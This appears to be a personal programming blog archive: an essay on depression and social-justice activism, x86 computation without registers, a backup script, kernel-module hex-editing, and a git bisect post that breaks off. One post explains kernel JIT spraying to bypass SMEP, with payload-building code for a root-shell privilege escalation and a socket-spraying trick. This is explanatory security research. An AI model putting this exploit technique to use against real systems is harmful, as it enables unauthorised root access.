Tuesday, June 10, 2014

On depression, privilege, and online activism

[Content warning: depression, privilege, online activism]

This isn't a general account of my experiences with depression. Many people have written about that, and I don't have much to add. But there's one aspect that I don't hear about very often. It's something that bothers me a lot, and others have told me that it bothers them too.

The thing is, I'm not just a person with a mental illness. I'm also a well-off white guy, and I enjoy a whole set of unearned privileges from that. Every day people around the world are harassed, abused, and killed over things I never have to worry about. Even in mundane daily life, most everyone is playing on a higher difficulty setting than I ever will.

I've thought about this a lot over the past few years, and I'm trying to understand how I can help make the world more fair and less oppressive. So I give money and I volunteer a little and I speak up when it seems useful, but mostly I listen. I listen to the experiences of people who are different from me. I try to get some understanding of how they feel and why.

How is this related to depression? Because the reality of privilege and oppression is fucking depressing. Of course it's depressing to those who are directly harmed. That's a lot of what I read about, and some of the despair transfers to me. But my profiting from the suffering of others in a way that I mostly can't change is also depressing, at least if I make an attempt not to ignore it.

And my distress over my role in systems of oppression brings its own layer of guilt. People are actually suffering and I feel sorry for myself because I'm dimly aware of it? But this comes from the voice that has always taunted me about depression. “How can you be sad? Your life is great. If you had real problems you wouldn't be so pathetic. You're not really sick. You're just a whiner.”

All of which is part of the disease. I need to own it and work on it every day. But it seems like every time I read an online discussion about social justice, I take a huge step backwards.

It's hard to shrug off the “men are horrible” comments when I spend so much effort trying to convince myself that I'm not horrible. When I hear people gloating about delicious white male tears, I think about all the times when I would come home from work and collapse in bed crying. Is this what they want my life to be?

I can't give myself permission to tune out, because the same people lecture constantly about my obligation to be a good ally, which mostly takes the form of “shut up and listen.” And then when I'm upset by the things they say, the response is “This isn't for you! Why are you listening?”

A local group, one that had recently invited me to hang out as a guest, retweeted a member's declaration to would-be allies: “We're not friends. Fuck you.” Can you see why it feels like they're trying to hurt me?


Let me be clear: I truly don't care if people in a room somewhere are talking about how men are the worst. I don't feel oppressed by it, and I have no desire to argue with it. But I can't handle direct exposure.

And don't tell me that I'm too stupid to understand why they say these things. I know intellectually that it's not about me. I understand the need to vent and the importance of building solidarity. None of that matters on the emotional level where these comments register like a punch to the gut. I do feel this way, even if I shouldn't and I wish I didn't.

I'm talking about mental health, triggers, and unintentionally hurtful speech. Does that sound familiar? One reason I was drawn to intersectional feminism is that it seemed to have a good set of ground rules for how to treat everyone decently. But now I feel like I'm excluded from protection. “Men are horrible” is apparently the one form of speech where intent is all that matters, and I'm a bad person if it triggers something. I've been told it's offensive that I would even try to describe my experience in those terms.

It hurts a whole lot to try and really feel someone's pain, and then realize they don't even slightly give a shit about me. It hurts even more when they'll bend over backwards for anyone except me.

Look, I get it. You argue all the time with trolls who claim that men have it just as bad as women and will shout “what about the men” as a way to disrupt any discussion. When you're engaged in meme warfare, you can't show them any human empathy. They certainly wouldn't return the favor. And if my voice sounds a little like theirs, that's just too bad for me.

I know that this article will serve as ammunition for some people with views I find disgusting. That sucks, but I'm done using political strategy as a reason to stay silent. I understand tone policing as a derailing tactic, and I understand the need to call it out. But at this point it seems there's no room for a sincere request for kindness, especially coming from someone who doesn't get much benefit of the doubt. (The Geek Feminism Wiki basically says that asking for kindness is tone policing if and only if you're a man.)

I'm not trying to silence anyone here. I'm not jumping in and derailing an existing conversation. I'm writing on my own blog, on my own schedule, about my own feelings. But I'm told that even this is crossing a line.

I know that I can't dictate how others feel about our fucked-up world. Does that mean I must absolutely suppress the way I feel? Even when we agree about the substance of what's wrong? I know that if I ask someone to share their life experiences, they have a right to express anger. When does expressing anger become sustained, deliberate cruelty?

“People are being oppressed and you're asking us to care about your feelings?” Yes, I am asking you to care. Just a little bit. I don't claim that my feelings should be a top priority. I hope it wouldn't come up very often. But according to the outspoken few who set the tone, I'm never allowed to bring it up. I don't deserve to ask them to be nice.

And that's why I can no longer have anything to do with this movement. It's really that simple. I guess it says something about my state of mind that I felt the need to attach 1,700 words of preemptive defenses.


The truth is, when I'm not allowed to say or even think “not all men,” part of me hears “Yes, all men, especially you.” And if I'm ever confused about whether I'm allowed to say “not all men,” there are a dozen unprompted reminders every day. Little jokes, repeated constantly to set the climate about what will and won't be tolerated.

When you treat me like one of the trolls, I start to believe that I am one. Guys who say “I support feminism but sometimes they go too far” are usually trying to excuse sexist behavior. So what do I conclude about myself when I have the same thought?

I get that “ally” is not a label you self-apply, it's a thing you do, and the label comes from others. The problem is, if a hundred people say I'm a good ally, and one person says I'm a sexist asshole, who do you think I'm going to believe?

I'm not allowed to stand up for myself, because doing so is automatically an act of oppression. If a woman treats me like shit, and she's being “more feminist” than me, I conclude that I deserve to be treated like shit. That is the model I've learned of a good ally.

I'm not a good ally, or even a bad one. I'm collateral damage.

If the point of all this is to give me a tiny little taste of the invalidation that others experience on a regular basis, then congratulations, it worked. You've made your point. Now that you've broken me, how can I possibly help you, when it seems like I'm part of the problem just by existing? It feels like all I can do is engage in emotional self-harm to repay the debt of how I was born.

I can't just take a break “until I feel better.” My depressive symptoms will always come and go, and some thoughts will reliably bring them back. I spent years reading about how the most important thing I can do, as a winner of the birth lottery, is to be an ally to marginalized people. And now I've realized that I'm too sick and weak to do it.

Even if I give up on being an ally, I can't avoid this subject. It affects a lot of my friends, and I feel even worse when I ask them not to talk about it around me. I don't want to silence anyone. At least I've mostly stopped using Twitter.

So this is how I feel, but I'm not sure anyone else can do anything about it. Really, most of the people I've talked to have been sympathetic. Maybe I need to learn not to let bullies get to me, even when they're bullying in service of a cause I support. They don't seem to get much pushback from the wider community, at any rate.

What gives me hope is, I recognize that my participation in the endless shouting online wasn't really useful to anyone. If I can let myself ignore all that, maybe I can recover some of my energy for other activities that actually help people.

That's all I have to say right now. Thank you for listening to me.

Tuesday, February 11, 2014

x86 is Turing-complete with no registers

In which x86 has too many registers after all.

Introduction

The fiendish complexity of the x86 instruction set means that even bizarrely restricted subsets are capable of arbitrary computation. As others have shown, we can compute using alphanumeric machine code or English sentences, using only the mov instruction, or using the MMU as it handles a never-ending double-fault. Here is my contribution to this genre of Turing tarpit: x86 is Turing-complete with no registers.

No registers?

What do I mean by "no registers"? Well, really just whatever makes the puzzle interesting, but the basic guideline is:

No instruction's observable behavior can depend on the contents of any ordinary user-space register.

So we can't read from R[ABCD]X, R[SD]I, R[SB]P (that's right, no stack), R8-R15, any of their smaller sub-registers, or any of the x87 / MMX / SSE registers. This forbids implicit register access like push or movsb as well as explicit operands. I think I would allow RIP-relative addressing, but it's probably not useful when you're building a single executable which loads at a fixed address.

We also can't use the condition flags in EFLAGS, so conditional jumps and moves are right out. Many instructions will set these flags, but those dead stores are okay by me.

All memory access depends on segment selectors, the page table base in CR3, and so on. We trust that the OS (Linux in my example) has set up a reasonable flat memory model, and we shouldn't try to modify that. Likewise there are debug registers, parts of EFLAGS (such as the trap bit), and numerous MSRs which can influence the execution of nearly any instruction. We ignore all that too. Basically, the parts of CPU state which normal user-space code doesn't touch are treated as constants.

So what's left that we can work with? Just

  • the instruction pointer,
  • memory operands, and
  • self-modifying code.

But it would be too easy to self-modify an instruction into having a register operand. The above restrictions must hold for every instruction we execute, not just those appearing in our binary. Later on I'll demonstrate experimentally that we aren't cheating.

The instruction set

In a RISC architecture, every memory access is a register load or store, and our task would be completely impossible. But x86 does not have this property. For example we can store a constant directly into memory. Here's machine code along with NASM (Intel syntax) assembly:

c6042500004000ba          mov byte  [0x400000], 0xba
66c7042500004000dbba      mov word  [0x400000], 0xbadb
c7042500004000efbead0b    mov dword [0x400000], 0xbadbeef
48c7042500004000efbead0b  mov qword [0x400000], 0xbadbeef

In the latter case the 4-byte constant is sign-extended to 8 bytes.

We can also perform arithmetic on a memory location in place:

8304250000400010          add dword [0x400000], 0x10

But moving data around is going to be hard. As far as I know, every instruction which loads from one address and stores to another, for example movsb, depends on registers in some way.

Conditional control flow is possible thanks to this gem of an instruction:

ff242500004000            jmp qword [0x400000]

This jumps to whatever address is stored as a 64-bit quantity at address 0x400000. This seems weird but it's really just a load where the destination register is the instruction pointer. Many RISC architectures also allow this.

Compiling from Brainfuck

Let's get more concrete and talk about compiling Brainfuck code to this subset of x86. Brainfuck isn't the simplest language out there (try Subleq) but it's pretty familiar as an imperative, structured-control language. So I think compiling from Brainfuck makes this feel "more real" than compiling from something super weird.

A Brainfuck program executes on a linear tape of (typically) byte-size cells.

TAPE_SIZE equ 30000

tape_start:
    times TAPE_SIZE dq cell0

head equ tape_start + (TAPE_SIZE / 2)

Like many Brainfuck implementations, the tape has a fixed size (more on this later) and we start in the middle. head is not a variable with a memory location; it's just an assembler constant for the address of the middle of the tape.

Since our only way to read memory is jmp [addr], the tape must store pointers to code. We create 256 short routines, each representing one of the values a cell can hold.

cont_zero:     dq 0
cont_nonzero:  dq 0
out_byte:      db 0

align 16
cell_underflow:
    jmp inc_cell

align 16
cell0:
    mov byte [out_byte], 0
    jmp [cont_zero]

%assign cellval 1
%rep 255
    align 16
    mov byte [out_byte], cellval
    jmp [cont_nonzero]
    %assign cellval cellval+1
%endrep

align 16
cell_overflow:
    jmp dec_cell

There are two things we need to do with a cell: get its byte value for output, and test whether it's zero. So each routine moves a byte into out_byte and jumps to the address stored at either cont_zero or cont_nonzero.

We produce most of the routines using a NASM macro. We also have functions to handle underflow and overflow, so a cell which would reach -1 or 256 is bumped back to 0 or 255. (We could implement the more typical wrap-around behavior with somewhat more code.)

The routines are aligned on 16-byte boundaries so that we can implement Brainfuck's + and - by adding or subtracting 16. But how do we know where the head is? We can't store it in a simple memory variable because we'd need a double-indirect jump instruction. This is where the self-modifying code comes in.

test_cell:
    jmp [head]

inc_cell:
    add qword [head], 16
    jmp test_cell

dec_cell:
    sub qword [head], 16
    jmp test_cell

move_right:
    add dword [inc_cell+4],  8
    add dword [dec_cell+4],  8
    add dword [test_cell+3], 8
    jmp [cont_zero]

move_left:
    sub dword [inc_cell+4],  8
    sub dword [dec_cell+4],  8
    sub dword [test_cell+3], 8
    jmp [cont_zero]

Recall that head is an assembler constant for the middle of the tape. So inc_cell etc. will only touch the exact middle of the tape — except that we modify the instructions when we move left or right. The address operand starts at byte 3 or 4 of the instruction (check the disassembly!) and we change it by 8, the size of a function pointer.

Also note that inc_cell and dec_cell jump to test_cell in order to handle overflow / underflow. By contrast the move instructions don't test the current cell and just jump to [cont_zero] unconditionally.

To output a byte we perform the system call write(1, &out_byte, 1). There's no escaping the fact that the Linux system call ABI uses registers, so I allow them here. We can do arbitrary computation without output; it's just nice if we can see the results. Input is messier still but it's not fundamentally different from what we've seen here. Code that self-modifies by calling read() is clearly the future of computing.

Putting it all together, I wrote a small Brainfuck compiler which does little more than match brackets. For each Brainfuck instruction it outputs one line of assembly, a call to a NASM macro which will load cont_[non]zero and jump to one of test_cell, inc_cell, etc. For the program [+] the compiler's output looks like

k00000000: do_branch k00000003, k00000001
k00000001: do_inc    k00000002
k00000002: do_branch k00000003, k00000001
k00000003: jmp exit

which blows up into something like

401205:  48c70425611240005c124000  mov qword ptr [0x401261], 0x40125c
401211:  48c704256912400022124000  mov qword ptr [0x401269], 0x401222
40121d:  e90cefffff                jmp 40012e <test_cell>

401222:  48c70425611240003f124000  mov qword ptr [0x401261], 0x40123f
40122e:  48c70425691240003f124000  mov qword ptr [0x401269], 0x40123f
40123a:  e9f6eeffff                jmp 400135 <inc_cell>

40123f:  48c70425611240005c124000  mov qword ptr [0x401261], 0x40125c
40124b:  48c704256912400022124000  mov qword ptr [0x401269], 0x401222
401257:  e9d2eeffffe9d2eeffff      jmp 40012e <test_cell>

40125c:  e9c1eeffff                jmp 400122 <exit>

Even within our constraints, this code could be a lot more compact. For example, a test could be merged with a preceding inc or dec.

Demos

Let's try it out on some of Daniel B Cristofani's Brainfuck examples.

$ curl -s http://www.hevanet.com/cristofd/brainfuck/rot13.b | ./compiler
$ echo 'Uryyb, jbeyq!' | ./rip
Hello, world!

$ curl -s http://www.hevanet.com/cristofd/brainfuck/fib.b | ./compiler
$ ./rip
0
1
1
2
3
5
8
13
…

And now let's try a Brainfuck interpreter written in Brainfuck. There are several, but we will choose the fastest one (by Clive Gifford), which is also compatible with our handling of end-of-file and cell overflow.

$ curl -s http://homepages.xnet.co.nz/~clive/eigenratios/cgbfi2.b | ./compiler
$ (curl -s http://www.hevanet.com/cristofd/brainfuck/rot13.b;
   echo '!Uryyb, jbeyq!') | ./rip
Hello, world!

This takes about 4.5 seconds on my machine.

Verifying it with ptrace

How can we verify that a program doesn't use registers? There's no CPU flag to disable registers, but setting them to zero after each instruction is close enough. Linux's ptrace system call allows us to manipulate the state of a target process.

uint64_t regs_boundary;

void clobber_regs(pid_t child) {
    struct user_regs_struct   regs_int;
    struct user_fpregs_struct regs_fp;

    CHECK(ptrace(PTRACE_GETREGS, child, 0, &regs_int));
    if (regs_int.rip < regs_boundary)
        return;

    CHECK(ptrace(PTRACE_GETFPREGS, child, 0, &regs_fp));

    // Clear everything before the instruction pointer,
    // plus the stack pointer and some bits of EFLAGS.
    memset(&regs_int, 0, offsetof(struct user_regs_struct, rip));
    regs_int.rsp = 0;
    regs_int.eflags &= EFLAGS_MASK;

    // Clear x87 and SSE registers.
    memset(regs_fp.st_space,  0, sizeof(regs_fp.st_space));
    memset(regs_fp.xmm_space, 0, sizeof(regs_fp.xmm_space));

    CHECK(ptrace(PTRACE_SETREGS,   child, 0, &regs_int));
    CHECK(ptrace(PTRACE_SETFPREGS, child, 0, &regs_fp));

    clobber_count++;
}

For the layout of struct user_regs_struct, see /usr/include/sys/user.h.

We allow registers in the first part of the program, which is responsible for system calls. regs_boundary is set by looking for the symbol FORBID_REGS in the binary.

We run the target using PTRACE_SINGLESTEP, which sets the trap flag so that the CPU will raise a debug exception after one instruction. Linux handles this exception, suspends the traced process, and wakes up the tracer, which was blocked on waitpid.

while (1) {
    // For this demo it's simpler if we don't deliver signals to
    // the child, so the last argument to ptrace() is zero.
    CHECK(ptrace(PTRACE_SINGLESTEP, child, 0, 0));
    CHECK(waitpid(child, &status, 0));

    if (WIFEXITED(status))
      finish(WEXITSTATUS(status));

    inst_count++;
    clobber_regs(child);
}

And the demo:

$ gcc -O2 -Wall -o regclobber regclobber.c
$ curl -s http://www.hevanet.com/cristofd/brainfuck/rot13.b | ./compiler
$ echo 'Uryyb, jbeyq!' | time ./regclobber ./rip
Hello, world!

Executed 81366 instructions; clobbered registers 81189 times.
0.36user 1.81system 0:01.96elapsed 110%CPU (0avgtext+0avgdata 1392maxresident)k

At almost two seconds elapsed, this is hundreds of times slower than running ./rip directly. Most of the time is spent in the kernel, handling all those system calls and debug exceptions.

I wrote about ptrace before if you'd like to see more of the things it can do.

Notes on universality

Our tape has a fixed size of 30,000 cells, the same as Urban Müller's original Brainfuck compiler. A system with a finite amount of state can't really be Turing-complete. But x86 itself also has a limit on addressable memory. So does C, because sizeof(void *) is finite. These systems are Turing-complete when you add an external tape using I/O, but so is a finite-state machine!

So while x86 isn't really Turing-complete, with or without registers, I think the above construction "feels like" arbitrary computation enough to meet the informal definition of "Turing-complete" commonly used by programmers, for example in the mov is Turing-complete paper. If you know of a way to formalize this idea, do let me know (I'm more likely to notice tweets @miuaf than comments here).

Sunday, December 30, 2012

A shell recipe for backups with logs and history

I wrote a shell script for a cron job that grabs backups of some remote files. It has a few nice features:

  • Output from the backup commands is logged, with timestamps.
  • cron will send me email if one of the commands fails.
  • The history of each backup is saved in Git. Nothing sucks more than corrupting an important file and then syncing that corruption to your one and only backup.

Here's how it works.

#!/bin/bash -e

cd /home/keegan/backups
log="$(pwd)"/log

exec 3>&2 > >(ts >> "$log") 2>&1

You may have seen exec used to tail-call a command, but here we use it differently. When no command is given, exec applies file redirections to the current shell process.

We apply timestamps by redirecting output through ts (from moreutils), and append that to the log file. I would write exec | ts >> $log, except that pipe syntax is not supported with exec.

Instead we use process substitution. >(cmd) expands to the name of a file, whose contents will be sent to the specified command. This file name is a fine target for normal file output redirection with >. (It might name a temporary file created by the shell, or a special file under /dev/fd/.)

We also redirect standard error to the same place with 2>&1. But first we open the original standard error as file descriptor 3, using 3>&2.

function handle_error {
    echo 'Error occurred while running backup' >&3
    tail "$log" >&3
    exit 1
}
trap handle_error ERR

Since we specified bash -e in the first line of the script, Bash will exit as soon as any command fails. We use trap to register a function that gets called if this happens. The function writes some of the log file to the script's original standard output. cron will capture that and send mail to the system administrator.

Now we come to the actual backup commands.

cd foo
git pull

cd ../bar
rsync -v otherhost:bar/baz .
git commit --allow-empty -a -m '[AUTO] backup'
git repack -da

foo is a backup of a Git repo, so we just update a clone of that repo. If you want to be absolutely sure to preserve all commits, you can configure the backup repo to disable automatic garbage collection and keep infinite reflog.

bar is a local-only Git repo storing history of a file synced from another machine. Semantically, Git stores each version of a file as a separate blob object. If the files you're backing up are reasonably large, this can waste a lot of space quickly. But Git supports "packed" storage, where the objects in a repo are compressed together. By repacking the repo after every commit, we can save a ton of space.

Monday, December 17, 2012

Hex-editing Linux kernel modules to support new hardware

This is an old trick but a fun one. The ThinkPad X1 Carbon has no built-in Ethernet port. Instead it comes with a USB to Ethernet adapter. The adapter uses the ASIX AX88772 chip, which Linux has supported since time immemorial. But support for the particular adapter shipped by Lenovo was only added in Linux 3.7.

This was a problem for me, since I wanted to use a Debian installer with a 3.2 kernel. I could set up a build environment for that particular kernel and recompile the module. But this seemed like an annoying yak to shave when I just wanted to get the machine working.

The patch to support the Lenovo adapter just adds a new USB device ID to an existing driver:

 }, {
+       // Lenovo U2L100P 10/100
+       USB_DEVICE (0x17ef, 0x7203),
+       .driver_info = (unsigned long) &ax88772_info,
+}, {
        // ASIX AX88772B 10/100
        USB_DEVICE (0x0b95, 0x772b),
        .driver_info = (unsigned long) &ax88772_info,

As a quick-and-dirty solution, we can edit the compiled kernel module asix.ko, changing that existing device ID (0x0b95, 0x772b) to the Lenovo one (0x17ef, 0x7203). Since x86 CPUs are little-endian, this involves changing the bytes

95 0b 2b 77

to

ef 17 03 72

I wanted to do this within the Debian installer without rebooting. Busybox sed does not support hex escapes, but printf does:

sed $(printf 's/\x95\x0b\x2b\x77/\xef\x17\x03\x72/') \
    /lib/modules/$(uname -r)/kernel/drivers/net/usb/asix.ko \
    > /tmp/asix.ko

(It's worth checking that none of those bytes have untoward meanings as ASCII characters in a regular expression. As it happens, sed does not recognize + (aka \x2b) as repetition unless preceded by a backslash.)

Then I loaded the patched module along with its dependencies. A simple way is

modprobe asix
rmmod asix
insmod /tmp/asix.ko

And that was enough for me to complete the install over Ethernet. Of course, once everything is set up, it would be better to compile a properly-patched kernel using make-kpkg. I haven't got around to it yet because wireless is working great. :)

Saturday, November 17, 2012

Attacking hardened Linux systems with kernel JIT spraying

Intel's new Ivy Bridge CPUs support a security feature called Supervisor Mode Execution Protection (SMEP). It's supposed to thwart privilege escalation attacks, by preventing the kernel from executing a payload provided by userspace. In reality, there are many ways to bypass SMEP.

This article demonstrates one particularly fun approach. Since the Linux kernel implements a just-in-time compiler for Berkeley Packet Filter programs, we can use a JIT spraying attack to build our attack payload within the kernel's memory. Along the way, we will use another fun trick to create thousands of sockets even if RLIMIT_NOFILE is set as low as 11.

If you have some idea what I'm talking about, feel free to skip the next few sections and get to the gritty details. Otherwise, I hope to provide enough background that anyone with some systems programming experience can follow along. The code is available on GitHub too.

Note to script kiddies: This code won't get you root on any real system. It's not an exploit against current Linux; it's a demonstration of how such an exploit could be modified to bypass SMEP protections.

Kernel exploitation and SMEP

The basis of kernel security is the CPU's distinction between user and kernel mode. Code running in user mode cannot manipulate kernel memory. This allows the kernel to store things (like the user ID of the current process) without fear of tampering by userspace code.

In a typical kernel exploit, we trick the kernel into jumping to our payload code while the CPU is still in kernel mode. Then we can mess with kernel data structures and gain privileges. The payload can be an ordinary function in the exploit program's memory. After all, the CPU in kernel mode is allowed to execute user memory: it's allowed to do anything!

But what if it wasn't? When SMEP is enabled, the CPU will block any attempt to execute user memory while in kernel mode. (Of course, the kernel still has ultimate authority and can disable SMEP if it wants to. The goal is to prevent unintended execution of userspace code, as in a kernel exploit.)

So even if we find a bug which lets us hijack kernel control flow, we can only direct it towards legitimate kernel code. This is a lot like exploiting a userspace program with no-execute data, and the same techniques apply.

If you haven't seen some kernel exploits before, you might want to check out the talk I gave, or the many references linked from those slides.

JIT spraying

JIT spraying [PDF] is a viable tactic when we (the attacker) control the input to a just-in-time compiler. The JIT will write into executable memory on our behalf, and we have some control over what it writes.

Of course, a JIT compiling untrusted code will be careful with what instructions it produces. The trick of JIT spraying is that seemingly innocuous instructions can be trouble when looked at another way. Suppose we input this (pseudocode) program to a JIT:

x = 0xa8XXYYZZ
x = 0xa8PPQQRR
x = ...

(Here XXYYZZ and PPQQRR stand for arbitrary three-byte quantities.) The JIT might decide to put variable x in the %eax machine register, and produce x86 code like this:

machine code      assembly (AT&T syntax)

b8 ZZ YY XX a8    mov $0xa8XXYYZZ, %eax
b8 RR QQ PP a8    mov $0xa8PPQQRR, %eax
b8 ...

Looks harmless enough. But suppose we use a vulnerability elsewhere to direct control flow to the second byte of this program. The processor will then see an instruction stream like

ZZ YY XX          (payload instruction)
a8 b8             test $0xb8, %al
RR QQ PP          (payload instruction)
a8 b8             test $0xb8, %al
...

We control those bytes ZZ YY XX and RR QQ PP. So we can smuggle any sequence of three-byte x86 instructions into an executable memory page. The classic scenario is browser exploitation: we embed our payload into a JavaScript or Flash program as above, and then exploit a browser bug to redirect control into the JIT-compiled code. But it works equally well against kernels, as we shall see.

Attacking the BPF JIT

Berkeley Packet Filters (BPF) allow a userspace program to specify which network traffic it wants to receive. Filters are virtual machine programs which run in kernel mode. This is done for efficiency; it avoids a system call round-trip for each rejected packet. Since version 3.0, Linux on AMD64 optionally implements the BPF virtual machine using a just-in-time compiler.

For our JIT spray attack, we will build a BPF program in memory.

size_t code_len = 0;
struct sock_filter code[1024];

void emit_bpf(uint16_t opcode, uint32_t operand) {
    code[code_len++] = (struct sock_filter) BPF_STMT(opcode, operand);
}

A BPF "load immediate" instruction will compile to mov $x, %eax. We embed our payload instructions inside these, exactly as we saw above.

// Embed a three-byte x86 instruction.
void emit3(uint8_t x, uint8_t y, uint8_t z) {
    union {
        uint8_t  buf[4];
        uint32_t imm;
    } operand = {
        .buf = { x, y, z, 0xa8 }
    };

    emit_bpf(BPF_LD+BPF_IMM, operand.imm);
}

// Pad shorter instructions with nops.
#define emit2(_x, _y) emit3((_x), (_y), 0x90)
#define emit1(_x)     emit3((_x), 0x90, 0x90)

Remember, the byte a8 eats the opcode b8 from the following legitimate mov instruction, turning into the harmless instruction test $0xb8, %al.

Calling a kernel function is a slight challenge because we can only use three-byte instructions. We load the function's address one byte at a time, and sign-extend from 32 bits.

void emit_call(uint32_t addr) {
    emit2(0xb4, (addr & 0xff000000) >> 24);  // mov  $x,  %ah
    emit2(0xb0, (addr & 0x00ff0000) >> 16);  // mov  $x,  %al
    emit3(0xc1, 0xe0, 0x10);                 // shl  $16, %eax
    emit2(0xb4, (addr & 0x0000ff00) >>  8);  // mov  $x,  %ah
    emit2(0xb0, (addr & 0x000000ff));        // mov  $x,  %al
    emit2(0x48, 0x98);                       // cltq
    emit2(0xff, 0xd0);                       // call *%rax
}

Then we can build a classic "get root" payload like so:

emit3(0x48, 0x31, 0xff);  // xor  %rdi, %rdi
emit_call(get_kernel_symbol("prepare_kernel_cred"));
emit3(0x48, 0x89, 0xc7);  // mov  %rax, %rdi
emit_call(get_kernel_symbol("commit_creds"));
emit1(0xc3);              // ret

This is just the C call

commit_creds(prepare_kernel_cred(0));

expressed in our strange dialect of machine code. It will give root privileges to the process the kernel is currently acting on behalf of, i.e., our exploit program.

Looking up function addresses is a well-studied part of kernel exploitation. My get_kernel_symbol just greps through /proc/kallsyms, which is a simplistic solution for demonstration purposes. In a real-world exploit you would search a number of sources, including hard-coded values for the precompiled kernels put out by major distributions.

Alternatively the JIT spray payload could just disable SMEP, then jump to a traditional payload in userspace memory. We don't need any kernel functions to disable SMEP; we just poke a CPU control register. Once we get to the traditional payload, we're running normal C code in kernel mode, and we have the flexibility to search memory for any functions or data we might need.

Filling memory with sockets

The "spray" part of JIT spraying involves creating many copies of the payload in memory, and then making an informed guess of the address of one of them. In Dion Blazakis's original paper, this is done using a separate information leak in the Flash plugin.

For this kernel exploit, it turns out that we don't need any information leak. The BPF JIT uses module_alloc to allocate memory in the 1.5 GB space reserved for kernel modules. And the compiled program is aligned to a page, i.e., a multiple of 4 kB. So we have fewer than 19 bits of address to guess. If we can get 8000 copies of our program into memory, we have a 1 in 50 chance on each guess, which is not too bad.

Each socket can only have one packet filter attached, so we need to create a bunch of sockets. This means we could run into the resource limit on the number of open files. But there's a fun way around this limitation. (I learned this trick from Nelson Elhage but I haven't seen it published before.)

UNIX domain sockets can transmit things other than raw bytes. In particular, they can transmit file descriptors1. An FD sitting in a UNIX socket buffer might have already been closed by the sender. But it could be read back out in the future, so the kernel has to maintain all data structures relating to the FD — including BPF programs!

So we can make as many BPF-filtered sockets as we want, as long as we send them into other sockets and close them as we go. There are limits on the number of FDs enqueued on a socket, as well as the depth2 of sockets sent through sockets sent through etc. But we can easily hit our goal of 8000 filter programs using a tree structure.

#define SOCKET_FANOUT 20
#define SOCKET_DEPTH   3

// Create a socket with our BPF program attached.
int create_filtered_socket() {
    int fd = socket(AF_INET, SOCK_DGRAM, 0);
    setsockopt(fd, SOL_SOCKET, SO_ATTACH_FILTER, &filt, sizeof(filt));
    return fd;
}

// Send an fd through a UNIX socket.
void send_fd(int dest, int fd_to_send);

// Create a whole bunch of filtered sockets.
void create_socket_tree(int parent, size_t depth) {
    int fds[2];
    size_t i;
    for (i=0; i<SOCKET_FANOUT; i++) {
        if (depth == (SOCKET_DEPTH - 1)) {
            // Leaf of the tree.
            // Create a filtered socket and send it to 'parent'.
            fds[0] = create_filtered_socket();
            send_fd(parent, fds[0]);
            close(fds[0]);
        } else {
            // Interior node of the tree.
            // Send a subtree into a UNIX socket pair.
            socketpair(AF_UNIX, SOCK_DGRAM, 0, fds);
            create_socket_tree(fds[0], depth+1);

            // Send the pair to 'parent' and close it.
            send_fd(parent, fds[0]);
            send_fd(parent, fds[1]);
            close(fds[0]);
            close(fds[1]);
        }
    }
}

The interface for sending FDs through a UNIX socket is really, really ugly, so I didn't show that code here. You can check out the implementation of send_fd if you want to.

The exploit

Since this whole article is about a strategy for exploiting kernel bugs, we need some kernel bug to exploit. For demonstration purposes I'll load an obviously insecure kernel module which will jump to any address we write to /proc/jump.

We know that a JIT-produced code page is somewhere in the region used for kernel modules. We want to land 3 bytes into this page, skipping an xor %eax, %eax (31 c0) and the initial b8 opcode.

#define MODULE_START 0xffffffffa0000000UL
#define MODULE_END   0xfffffffffff00000UL
#define MODULE_PAGES ((MODULE_END - MODULE_START) / 0x1000)

#define PAYLOAD_OFFSET 3

A bad guess will likely oops the kernel and kill the current process. So we fork off child processes to do the guessing, and keep doing this as long as they're dying with SIGKILL.

int status, jump_fd, urandom;
unsigned int pgnum;
uint64_t payload_addr;

// ...

jump_fd = open("/proc/jump",   O_WRONLY);
urandom = open("/dev/urandom", O_RDONLY);

do {
    if (!fork()) {
        // Child process
        read(urandom, &pgnum, sizeof(pgnum));
        pgnum %= MODULE_PAGES;
        payload_addr = MODULE_START + (0x1000 * pgnum) + PAYLOAD_OFFSET;

        write(jump_fd, &payload_addr, sizeof(payload_addr));
        execl("/bin/sh", "sh", NULL);  // Root shell!
    } else {
        wait(&status);
    }
} while (WIFSIGNALED(status) && (WTERMSIG(status) == SIGKILL));

The forked children get a copy the whole process's state, of course, but they don't actually need it. The BPF programs live in kernel memory, which is shared by all processes. So the program that sets up the payload could be totally unrelated to the one that guesses addresses.

Notes

The full source is available on GitHub. It includes some error handling and cleanup code that I elided above.

I'll admit that this is mostly a curiosity, for two reasons:

  • SMEP is not widely deployed yet.
  • The BPF JIT is disabled by default, and distributions don't enable it.

Unless Intel abandons SMEP in subsequent processors, it will be widespread within a few years. It's less clear that the BPF JIT will ever catch on as a default configuration. But I'll note in passing that Linux is now using BPF programs for process sandboxing as well.

The BPF JIT is enabled by writing 1 to /proc/sys/net/core/bpf_jit_enable. You can write 2 to enable a debug mode, which will print the compiled program and its address to the kernel log. This makes life unreasonably easy for my exploit, by removing the address guesswork.

I don't have a CPU with SMEP, but I did try a grsecurity / PaX hardened kernel. PaX's KERNEXEC feature implements3 in software a policy very similar to SMEP. And indeed, the JIT spray exploit succeeds where a traditional jump-to-userspace fails. (grsecurity has other features that would mitigate this attack, like the ability to lock out users who oops the kernel.)

The ARM, SPARC, and 64-bit PowerPC architectures each have their own BPF JIT. But I don't think they can be used for JIT spraying, because these architectures have fixed-size, aligned instructions. Perhaps on an ARM kernel built for Thumb-2...


  1. Actually, file descriptions. The description is the kernel state pertaining to an open file. The descriptor is a small integer referring to a file description. When we send an FD into a UNIX socket, the descriptor number received on the other end might be different, but it will refer to the same description.

  2. While testing this code, I got the error ETOOMANYREFS. This was easy to track down, as there's only one place in the entire kernel where it is used.

  3. On i386, KERNEXEC uses x86 segmentation, with negligible performance impact. Unfortunately, AMD64's vestigial segmentation is not good enough, so there KERNEXEC relies on a GCC plugin to instrument every computed control flow instruction in the kernel. Specifically, it ors the target address with (1 << 63). If the target was a userspace address, the new address will be non-canonical and the processor will fault.

Tuesday, September 18, 2012

Tracking down unused variables with Pyflakes and git bisect

I was working on a Python project when I noticed a variable that was defined but never used. Does this indicate that some important code was accidentally deleted? Or was there just a minor oversight during refactoring?

To answer this question, I wanted to see the Git commit which removed the last use of this variable. This sounds like a job for git bisect. And because Pyflakes can detect unused variables, the whole process is completely automatic.

I made a guess that the mystery_variable became unused sometime within the past two weeks. Then I told Git to consider a commit "good" if Pyflakes's list of complaints does not mention mystery_variable.

$ git bisect start master master@{'2 weeks ago'}
Already on 'master'
Bisecting: 150 revisions left to test after this (roughly 7 steps)
[066327622129dbe863f6e2fc4746ff9e869bd049] Synthesize gravity

